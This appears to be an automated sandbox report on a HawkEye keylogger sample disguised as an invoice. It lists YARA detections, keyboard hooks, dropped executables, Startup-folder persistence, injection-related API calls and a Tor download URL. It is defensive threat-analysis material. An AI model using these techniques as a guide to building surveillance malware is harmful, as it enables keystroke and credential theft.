                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, origigoods40.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443

                            Key, Mouse, Clipboard, Microphone and Screen Capturing:

                            barindex
                            Yara detected HawkEye KeyloggerShow sources
                            Source: Yara matchFile source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara matchFile source: dropped/hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Contains functionality to log keystrokes (.Net Source)Show sources
                            Source: hawkgoods.exe.5.dr, Form1.cs.Net Code: HookKeyboard
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                            Installs a global keyboard hookShow sources
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWindows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWindows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.275896420.0000000001448000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWindow created: window name: CLIPBRDWNDCLASS

                            System Summary:

                            barindex
                            Malicious sample detected (through community Yara rule)Show sources
                            Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: dropped/hawkgoods.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: dropped/hawkgoods.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                            .NET source code contains very large array initializationsShow sources
                            Source: origigoods40.exe.5.dr, u003cPrivateImplementationDetailsu003eu007b772D8D2Cu002d540Eu002d45C7u002dB77Bu002d87944040F8A1u007d/u0033BD2C1DBu002d851Du002d4774u002dA593u002d2F90268EC16C.csLarge array initialization: .cctor: array initializer size 11965
                            Source: 7.0.origigoods40.exe.c30000.0.unpack, u003cPrivateImplementationDetailsu003eu007b772D8D2Cu002d540Eu002d45C7u002dB77Bu002d87944040F8A1u007d/u0033BD2C1DBu002d851Du002d4774u002dA593u002d2F90268EC16C.csLarge array initialization: .cctor: array initializer size 11965
                            Source: 7.2.origigoods40.exe.c30000.0.unpack, u003cPrivateImplementationDetailsu003eu007b772D8D2Cu002d540Eu002d45C7u002dB77Bu002d87944040F8A1u007d/u0033BD2C1DBu002d851Du002d4774u002dA593u002d2F90268EC16C.csLarge array initialization: .cctor: array initializer size 11965
                            Initial sample is a PE file and has a suspicious nameShow sources
                            Source: initial sampleStatic PE information: Filename: PO_Invoices_pdf.exe
                            Source: initial sampleStatic PE information: Filename: PO_Invoices_pdf.exe
                            Powershell drops PE fileShow sources
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B658C6 NtUnmapViewOfSection,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B6581E NtQuerySystemInformation,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B6596E NtWriteVirtualMemory,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B657DA NtQuerySystemInformation,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B65941 NtWriteVirtualMemory,
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeCode function: 0_2_02F7CC7C
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeCode function: 0_2_07B81928
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeCode function: 0_2_07B82950
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeCode function: 0_2_07C493D8
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeCode function: 0_2_07C47F80
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0095CF58
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0095CF38
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_002FD426
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_002FD523
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_0030D5AE
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00307646
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_003329BE
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00336AF4
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_0035ABFC
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00353C4D
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00353CBE
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00353D2F
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_002FED03
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00353DC0
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_0030AFA6
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_002FCF92
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B36048
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B38710
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B35758
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B37098
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B37088
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B31D98
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_0032C7BC
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeCode function: 7_2_00C35804
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeCode function: 7_2_00C32296
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeCode function: 7_2_015146A0
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeCode function: 7_2_015145B0
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeCode function: 7_2_0151D300
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 25ADE9899C000A27570B527CFFC938EC9626978219EC8A086082B113CBE4F492
